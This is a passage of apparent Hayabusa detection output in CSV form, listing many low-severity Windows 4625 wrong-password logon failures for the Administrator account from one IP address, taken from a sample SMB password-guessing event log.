NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:43.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.174 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.472 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.794 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.946 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:44.983 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.105 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.326 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.477 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.579 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.614 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.665 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.829 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:45.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.011 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.058 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.145 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.326 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.717 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:46.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.157 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:47.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | 